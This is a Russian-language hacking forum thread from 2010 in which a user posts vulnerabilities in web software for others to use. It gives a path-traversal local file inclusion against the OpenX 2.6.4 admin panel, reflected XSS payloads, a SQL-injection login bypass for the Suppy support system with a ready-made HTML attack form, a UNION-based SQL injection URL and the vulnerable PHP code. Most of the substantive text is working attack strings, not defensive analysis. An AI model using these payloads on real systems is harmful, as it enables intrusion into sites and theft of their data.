Найденные уязвимости
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Найденные уязвимости - 2010-04-24 14:15:40.483333
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Предлагаю сюда постить уязвимости в различных CMS, скриптах, и т.п. Дабы не создавать темы из-за одной уязвимости :)
|
|
|
RE: Найденные уязвимости - 2010-04-24 14:16:49.280000
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Ну-с начнём. OpenX 2.6.4 LFI Need: Права админа /openx/www/admin/stats.php?entity=../../../../../../shell&breakdown=Обязательно пустое. [right]// shell, у меня там просто в папке с OpenX лежит файл shell.php, там <?PHP phpinfo(); ?> Код выполнился.[/right] Если breakdown не вписать, то будет инклюдиться нечто вроде: openx/lib/OA/Admin/Statistics/Delivery/Controller/../../../../../../shellAdvertiser.php Пассивная XSS: openx/www/admin/stats.php?entity=campaign&breakdown=history&clientid=1&campaignid=1%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
|
|
|
RE: Найденные уязвимости - 2010-04-24 14:48:11.583333
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
Пятой точкой чувствую что это превратиться в передирание постов с ачата…
|
|
|
RE: Найденные уязвимости - 2010-04-24 15:01:33.863333
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Неа :) Пока у меня минусомёт не отберут, любой копипаст не пройдёт )
|
|
|
RE: Найденные уязвимости - 2010-04-28 11:38:08.906666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Suppy Suppy is a small supportsystem based on PHP and MySQL. Beta ! Homepage: http://sourceforge.net/projects/suppy/ Пассивная XSS: quote:
/login.php?error=%3Cscript%3Ealert();%3C/script%3E Auth ByPass /login.php В Anmeldename: 1' or 1=1 /* Passwort: 12345 Exploit: quote:
<form method="post" action="http://site.com/login.php">
<input name="name" type="text" value="1' or 1=1 -- " />
<input name="pw" type="password" value="Ulalala"/>
<input name="login" type="submit" value="Login" />
SQL Inj: quote:
/bb/getfile.php?id=-1+union+select+1,2,3,4,5,6,7,8+–+ Code:
if(isset($_GET['id']) && isset($_SESSION['ID_user']))
{
include_once('utils/dbcon.php');
$con = new DBcon();
$con->AddSQL("SELECT * FROM file ");
$con->AddSQL("WHERE ID_file=".$_GET['id']);
|
|
|
|
|